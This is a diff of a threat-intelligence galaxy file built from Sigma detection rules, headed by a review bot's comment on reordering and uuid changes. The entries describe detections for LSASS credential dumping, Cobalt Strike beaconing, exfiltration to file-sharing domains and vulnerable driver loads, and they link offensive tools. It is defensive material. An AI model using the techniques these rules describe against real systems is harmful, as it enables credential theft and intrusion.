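Review bot: Most of this hunk is a reorder rather than a content change, which makes the genuine edits to the galaxy hard to review: the CACTUSTORCH entry removed here (uuid 2e4e488a-…) is re-added with the same uuid in the hunk at -20603 with only its refs reordered, the CobaltStrike entry (6309645e-…) is re-added further up the file, and the "Remote Thread Creation in Suspicious Targets" entry (a1a144b7-…) added here is deleted again in the hunk at -20724, while the -20589 hunk only moves one ref within the KeePass entry. The change that does matter in a diff like this is an existing value reappearing under a new uuid, as seems to happen at the top of this file section where "WMI Persistence" becomes "Powershell WMI Persistence" with a different uuid, since any galaxy relation (`dest-uuid`) or tag pointing at the old uuid silently dangles. If this cluster is produced by a generator, have it emit the `values` list sorted by a stable key such as `filename` or `uuid` and each `refs` list in a fixed order, so that a regeneration diffs to only the entries whose content actually changed. If it is hand-maintained, keep existing entries in place and reserve uuid changes for a deliberate, separately described commit.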
@@ -20603,79 +22595,33 @@ "value": "KeePass Password Dumping" }, { - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/02/19", - "falsepositive": [ - "Antivirus products" - ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml", - "level": "high", - "logsource.category": "create_remote_thread", - "logsource.product": "windows", - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.s0005", - "attack.t1003.001" - ] - }, - "uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "value": "Password Dumper Remote Thread in LSASS" - }, - { - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/06", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "creation_date": "2019/02/01", "falsepositive": [ "Unknown" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml", + "filename": "create_remote_thread_win_cactustorch.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_code_injection.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": 
"eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "value": "Accessing WinAPI in PowerShell. Code Injection" - }, - { - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/06/25", - "falsepositive": [ - "Unknown" - ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml", - "level": "high", - "logsource.category": "create_remote_thread", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml" + "https://github.com/mdsecactivebreach/CACTUSTORCH", + "https://twitter.com/SBousseaden/status/1090588499517079552", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml" ], "tags": [ "attack.defense_evasion", + "attack.t1055.012", "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ] }, - "uuid": "99b97608-3e21-4bfe-8217-2a127c396a0e", - "value": "PowerShell Rundll32 Remote Thread Creation" + "uuid": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "value": "CACTUSTORCH Remote Thread Creation" }, { "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like word.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", 
@@ -20724,31 +22670,6 @@ "uuid": "f016c716-754a-467f-a39e-63c06f773987", "value": "Suspicious Remote Thread Target" }, - { - "description": "Detects a remote thread creation in suspicious target images", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/16", - "falsepositive": [ - "Unknown" - ], - "filename": "create_remote_thread_win_susp_targets.yml", - "level": "high", - "logsource.category": "create_remote_thread", - "logsource.product": "windows", - "refs": [ - "https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_targets.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" - ] - }, - "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03", - "value": "Remote Thread Creation in Suspicious Targets" - }, { "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", "meta": { 
@@ -20774,607 +22695,79 @@ "value": "Remote Thread Creation Ttdinject.exe Proxy" }, { - "description": "Detects the creation of an ADS data stream that contains an executable (non-empty imphash)", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", "meta": { - "author": "Florian Roth, @0xrawsec", - "creation_date": "2018/06/03", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/11", "falsepositive": [ "Unknown" ], - "filename": "create_stream_hash_ads_executable.yml", - "level": "medium", - "logsource.category": "create_stream_hash", + "filename": "create_remote_thread_win_loadlibrary.yml", + "level": "high", + "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://twitter.com/0xrawsec/status/1002478725605273600?s=21", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml" + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-180719170510.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_loadlibrary.yml" ], "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.t1055.001" ] }, - "uuid": "b69888d4-380c-45ce-9cf9-d9ce46e67821", - "value": "Executable in ADS" + "uuid": "052ec6f6-1adc-41e6-907a-f1c813478bee", + "value": "CreateRemoteThread API and LoadLibrary" }, { - "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", - "meta": { - "author": "frack113", - "creation_date": "2022/10/22", - "falsepositive": [ - "Other legitimate browsers not currently included in the filter (please add them)", - "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" - ], - "filename": "create_stream_hash_creation_internet_file.yml", - "level": "medium", - 
"logsource.category": "create_stream_hash", - "logsource.product": "windows", - "refs": [ - "https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "573df571-a223-43bc-846e-3f98da481eca", - "value": "Creation Of a Suspicious ADS File Outside a Browser Download" - }, - { - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", + "description": "Detects PowerShell remote thread creation in Rundll32.exe", "meta": { "author": "Florian Roth", - "creation_date": "2022/08/24", + "creation_date": "2018/06/25", "falsepositive": [ "Unknown" ], - "filename": "create_stream_hash_hacktool_download.yml", + "filename": "create_remote_thread_win_susp_powershell_rundll32.yml", "level": "high", - "logsource.category": "create_stream_hash", + "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_hacktool_download.yml" + "https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_powershell_rundll32.yml" ], "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" - ] - }, - "uuid": "19b041f6-e583-40dc-b842-d6fa8011493f", - "value": "Hacktool Download" - }, - { - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "meta": { - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "creation_date": "2020/10/07", - 
"falsepositive": [ - "Unknown" - ], - "filename": "create_stream_hash_regedit_export_to_ads.yml", - "level": "high", - "logsource.category": "create_stream_hash", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", - "value": "Exports Registry Key To an Alternate Data Stream" - }, - { - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "create_stream_hash_susp_domain_ext_combo.yml", - "level": "high", - "logsource.category": "create_stream_hash", - "logsource.product": "windows", - "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" - ] - }, - "uuid": "52182dfb-afb7-41db-b4bc-5336cb29b464", - "value": "Suspicious File Download from File Sharing Domain" - }, - { - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "create_stream_hash_susp_domain_ext_combo_med.yml", - "level": "medium", - "logsource.category": "create_stream_hash", - "logsource.product": "windows", - "refs": [ - 
"https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" - ] - }, - "uuid": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", - "value": "Unusual File Download from File Sharing Domain" - }, - { - "description": "Detects the download of suspicious file type from URLs with IP", - "meta": { - "author": "Nasreddine Bencherchali, Florian Roth", - "creation_date": "2022/09/07", - "falsepositive": [ - "Unknown" - ], - "filename": "create_stream_hash_susp_ip_domains.yml", - "level": "high", - "logsource.category": "create_stream_hash", - "logsource.product": "windows", - "refs": [ - "https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "025bd229-fd1f-4fdb-97ab-20006e1a5368", - "value": "Unusual File Download from Direct IP Address" - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/07/11", - "falsepositive": [ - "FP may be caused in legitimate usage of the softwares mentioned above" - ], - "filename": "dns_query_remote_access_software_domains.yml", - "level": "medium", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_remote_access_software_domains.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", - "value": "Query To Remote Access Software Domain" - }, - { - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "meta": { - "author": "pH-T", - "creation_date": "2022/07/15", - "falsepositive": [ - "Legitimate access to anonfiles.com" - ], - "filename": "dns_query_win_anonymfiles_com.yml", - "level": "high", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ] - }, - "uuid": 
"065cceea-77ec-4030-9052-fc0affea7110", - "value": "DNS Query for Anonfiles.com Domain" - }, - { - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2021/04/12", - "falsepositive": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" - ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml", - "level": "high", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1554" - ] - }, - "uuid": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "value": "DNS HybridConnectionManager Service Bus" - }, - { - "description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL", - "meta": { - "author": "frack113", - "creation_date": "2021/11/24", - "falsepositive": [ - "Unknown" - ], - "filename": "dns_query_win_lobas_appinstaller.yml", - "level": "medium", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/notwhickey/status/1333900137232523264", - "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lobas_appinstaller.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", - "value": "AppInstaller Attempts From URL by DNS" - }, - { - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/09", - "falsepositive": [ 
- "Unknown" - ], - "filename": "dns_query_win_mal_cobaltstrike.yml", - "level": "critical", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", - "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "f356a9c4-effd-4608-bbf8-408afd5cd006", - "value": "Suspicious Cobalt Strike DNS Beaconing" - }, - { - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "meta": { - "author": "Aaron Greetham (@beardofbinary) - NCC Group", - "creation_date": "2021/05/26", - "falsepositive": [ - "Legitimate Mega upload" - ], - "filename": "dns_query_win_mega_nz.yml", - "level": "high", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mega_nz.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ] - }, - "uuid": "613c03ba-0779-4a53-8a1f-47f914a4ded3", - "value": "DNS Query for MEGA.io Upload Domain" - }, - { - "description": "Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. 
(DNS-record will saved in host cache for a while TTL).", - "meta": { - "author": "Ilyas Ochkov, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": "No established falsepositives", - "filename": "dns_query_win_possible_dns_rebinding.yml", - "level": "medium", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_possible_dns_rebinding.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1189" - ] - }, - "uuid": "eb07e747-2552-44cd-af36-b659ae0958e4", - "value": "Possible DNS Rebinding" - }, - { - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "meta": { - "author": "Dmitriy Lifanov, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "dns_query_win_regsvr32_network_activity.yml", - "level": "high", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", - "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml" - ], - "tags": [ "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.t1218.011", + "attack.t1059.001" ] }, - "uuid": "36e037c4-c228-4866-b6a3-48eb292b9955", - "value": "Regsvr32 Network Activity - DNS" + "uuid": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "value": "PowerShell Rundll32 Remote Thread Creation" }, { - "description": "Detects DNS queries for ip lookup services such as api.ipify.org not originating from a non browser process.", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by 
Mandiant and Sentinel One.", "meta": { - "author": "Brandon George (blog post), Thomas Patzke (rule)", - "creation_date": "2021/07/08", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/16", "falsepositive": [ - "Legitimate usage of ip lookup services such as ipify API" + "Legitimate BIOS driver updates (should be rare)" ], - "filename": "dns_query_win_susp_ipify.yml", - "level": "medium", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", - "https://twitter.com/neonprimetime/status/1436376497980428318", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ipify.yml" - ], - "tags": [ - "attack.reconnaissance", - "attack.t1590" - ] - }, - "uuid": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", - "value": "Suspicious DNS Query for IP Lookup Service APIs" - }, - { - "description": "Detect suspicious LDAP request from non-Windows application", - "meta": { - "author": "frack113", - "creation_date": "2022/08/20", - "falsepositive": [ - "Programs that also lookup the observed domain" - ], - "filename": "dns_query_win_susp_ldap.yml", - "level": "medium", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ldap.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482" - ] - }, - "uuid": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", - "value": "Suspicious LDAP Domain Access" - }, - { - "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/30", - "falsepositive": [ - "Unknown binary 
names of TeamViewer", - "Other programs that also lookup the observed domain" - ], - "filename": "dns_query_win_susp_teamviewer.yml", - "level": "medium", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://www.teamviewer.com/en-us/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", - "value": "Suspicious TeamViewer Domain Access" - }, - { - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", - "meta": { - "author": "frack113", - "creation_date": "2022/02/20", - "falsepositive": [ - "Unknown" - ], - "filename": "dns_query_win_tor_onion.yml", + "filename": "driver_load_win_mal_poortry_driver.yml", "level": "high", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_tor_onion.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090.003" - ] - }, - "uuid": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", - "value": "Query Tor Onion Address" - }, - { - "description": "Detects DNS queries for subdomains used for upload to ufile.io", - "meta": { - "author": "yatinwad and TheDFIRReport", - "creation_date": "2022/06/23", - "falsepositive": [ - "Legitimate Ufile upload" - ], - "filename": "dns_query_win_ufile_io.yml", - "level": "high", - "logsource.category": "dns_query", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_ufile_io.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ] - }, - "uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", - "value": "DNS Query for 
Ufile.io Upload Domain" - }, - { - "description": "Detects well-known credential dumping tools execution via service execution events", - "meta": { - "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2017/03/05", - "falsepositive": [ - "Legitimate Administrator using credential dumping tool for password recovery" - ], - "filename": "driver_load_mal_creddumper.yml", - "level": "critical", "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_mal_creddumper.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" - ] - }, - "uuid": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", - "value": "Credential Dumping Tools Service Execution" - }, - { - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "meta": { - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", - "creation_date": "2019/10/26", - "falsepositive": [ - "Highly unlikely" - ], - "filename": "driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", - "level": "critical", - "logsource.category": "driver_load", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_mal_poortry_driver.yml" ], "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1543", + "attack.t1068" ] }, - "uuid": "d585ab5a-6a69-49a8-96e8-4a726a54de46", - "value": "Meterpreter or Cobalt Strike Getsystem Service Installation" - }, - { - "description": "Detects powershell script installed as a Service", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/06", - "falsepositive": [ - "Unknown" - ], - "filename": "driver_load_powershell_script_installed_as_service.yml", - "level": "high", - "logsource.category": "driver_load", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ] - }, - "uuid": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", - "value": "PowerShell Scripts Run by a Services" - }, - { - "description": "Detects the load of drivers used by Process Hacker and System Informer", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/11/16", - "falsepositive": [ - "Legitimate user of process hacker or system informer by low level developers or system administrators" - ], - "filename": "driver_load_process_hacker.yml", - "level": "medium", - "logsource.category": "driver_load", - "logsource.product": "windows", - "refs": [ - "https://processhacker.sourceforge.io/", - "https://systeminformer.sourceforge.io/", - "https://github.com/winsiderss/systeminformer", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_process_hacker.yml" - ], - "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" - ] - }, - "uuid": "67add051-9ee7-4ad3-93ba-42935615ae8d", - "value": "Process Hacker and 
System Informer Driver Load"
+ "uuid": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6",
+ "value": "Usage Of Malicious POORTRY Signed Driver"
 },
 {
 "description": "Detects a driver load from a temporary directory",
@@ -21384,12 +22777,12 @@
 "falsepositive": [
 "There is a relevant set of false positives depending on applications in the environment"
 ],
- "filename": "driver_load_susp_temp_use.yml",
+ "filename": "driver_load_win_susp_temp_use.yml",
 "level": "high",
 "logsource.category": "driver_load",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_susp_temp_use.yml"
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_susp_temp_use.yml"
 ],
 "tags": [
 "attack.persistence",
@@ -21408,13 +22801,13 @@
 "falsepositive": [
 "Unknown"
 ],
- "filename": "driver_load_vuln_avast_anti_rootkit_driver.yml",
+ "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml",
 "level": "high",
 "logsource.category": "driver_load",
 "logsource.product": "windows",
 "refs": [
 "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_avast_anti_rootkit_driver.yml"
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_avast_anti_rootkit_driver.yml"
 ],
 "tags": [
 "attack.privilege_escalation",
@@ -21424,106 +22817,6 @@
 "uuid": "7c676970-af4f-43c8-80af-ec9b49952852",
 "value": "Vulnerable AVAST Anti Rootkit Driver Load"
 },
- {
- "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2021/05/05",
- "falsepositive": [
- "Legitimate BIOS driver updates (should be rare)"
- ],
- "filename": "driver_load_vuln_dell_driver.yml",
- "level": "high",
- "logsource.category": "driver_load",
- "logsource.product": "windows",
- "refs": [
- "https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_dell_driver.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "cve.2021.21551",
- "attack.t1543"
- ]
- },
- "uuid": "21b23707-60d6-41bb-96e3-0f0481b0fed9",
- "value": "Vulnerable Dell BIOS Update Driver Load"
- },
- {
- "description": "Detects the load of known vulnerable drivers by hash value",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/08/18",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "driver_load_vuln_drivers.yml",
- "level": "high",
- "logsource.category": "driver_load",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md",
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules",
- "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/",
- "https://github.com/jbaines-r7/dellicious",
- "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md",
- "https://github.com/namazso/physmem_drivers",
- 
"https://github.com/stong/CVE-2020-15368",
- "https://github.com/CaledoniaProject/drivers-binaries",
- "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html",
- "https://github.com/tandasat/ExploitCapcom",
- "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md",
- "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md",
